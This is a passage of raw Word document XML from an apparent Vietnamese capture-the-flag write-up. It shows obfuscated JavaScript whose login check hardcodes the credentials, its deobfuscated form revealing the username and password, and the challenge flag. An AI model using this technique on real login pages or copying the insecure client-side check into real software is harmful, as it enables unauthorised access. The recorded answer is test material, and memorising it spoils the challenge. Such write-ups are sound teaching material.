          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Thực hiện bắt gói tin và chỉnh sửa để có được kết quả</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0A8D0B"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28D1C952" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Bài cung trang login, ta sẽ thử đăng nhập </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13251EF7"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78B397F3" wp14:editId="1CD94A6D">
            <wp:extent cx="6114105" cy="6591300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2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6114105" cy="6591300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1221AAD9" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Kết quả không có user và pass chính </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>xác</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="30A3F464"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570908E5" wp14:editId="10A7161B">
            <wp:extent cx="6114105" cy="1689100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2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a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6114105" cy="1689100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE36497" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Kiểm tra phần respond ta thấy được thông tin như bên </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>dưới</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5A96BA8A"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7507C646" wp14:editId="464E5BAC">
            <wp:extent cx="5495925" cy="3943350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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495925" cy="3943350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="637F171F" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>var _0xae5b=["\x76\x61\x6C\x75\x65","\x75\x73\x65\x72","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x70\x61\x73\x73","\x43\x79\x62\x65\x72\x2d\x54\x61\x6c\x65\x6e\x74","\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x43\x6F\x6E\x67\x72\x61\x74\x7A\x20\x0A\x0A","\x77\x72\x6F\x6E\x67\x20\x50\x61\x73\x73\x77\x6F\x72\x64"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>];</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1DA6FC0C" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">function </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>check(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A200E89" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>var _0xeb80x2=document[_0xae5b[2</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>]](</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>_0xae5b[1])[_0xae5b[0]];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADA5DC3" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>var _0xeb80x3=document[_0xae5b[2</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>]](</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>_0xae5b[3])[_0xae5b[0]];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164BB9F7" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>if(_0xeb80x2==_0xae5b[</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>4]&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>&amp;_0xeb80x3==_0xae5b[4]){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7229EE14" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>alert(_0xae5</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>b[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>5]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9F5BB1" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758D7AD3" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>else {alert(_0xae5</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>b[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>6]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FADF593" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB2EB3B" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF726AC" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D93986F" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Ta sẽ thực hiện giải mã bằng công cụ </w:t>
      </w:r>
      <w:hyperlink r:id="rId17">
        <w:r w:rsidRPr="007913DC">
          <w:rPr>
            <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://deobfuscate.io/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="624BAF37" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">function </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>check(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8DC978" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  var _0xeb80x2 = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>document.getElementById</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>("user").value;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3676B711" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  var _0xeb80x3 = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>document.getElementById</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>("pass").value;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0359E30B" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  if (_0xeb80x2 == "Cyber-Talent" &amp;&amp; _0xeb80x3 == "Cyber-Talent") {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A67C4A3" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>"                      Congratz \n\n");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EF580F" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  } else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E123628" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>"wrong Password");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB455ED" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1051442F" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B185CF" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">ta sẽ có được chương trình </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>sau</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6D671BA8"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471FB338" wp14:editId="262B4E1A">
            <wp:extent cx="6114105" cy="3441700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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6114105" cy="3441700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="279CE47C" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Với đoạn code trên ta có thể dự đoán được rằng là user và pass là: Cyber-Talent. thử đăng nhập lại </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F6249D"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665FFE5B" wp14:editId="0BADCAC5">
            <wp:extent cx="6114105" cy="20066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6114105" cy="2006600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E78463" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>flag: {J4V4_Scr1Pt_1S_Aw3s0me}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCE8C47" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Khuyến cáo: Lọc đầu vào gói tin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E8501E" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66565DF2" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="404040"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_heading=h.nsn2w7o6z4c0" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Kịch bản Iam Legend </w:t>
      </w:r>
    </w:p>
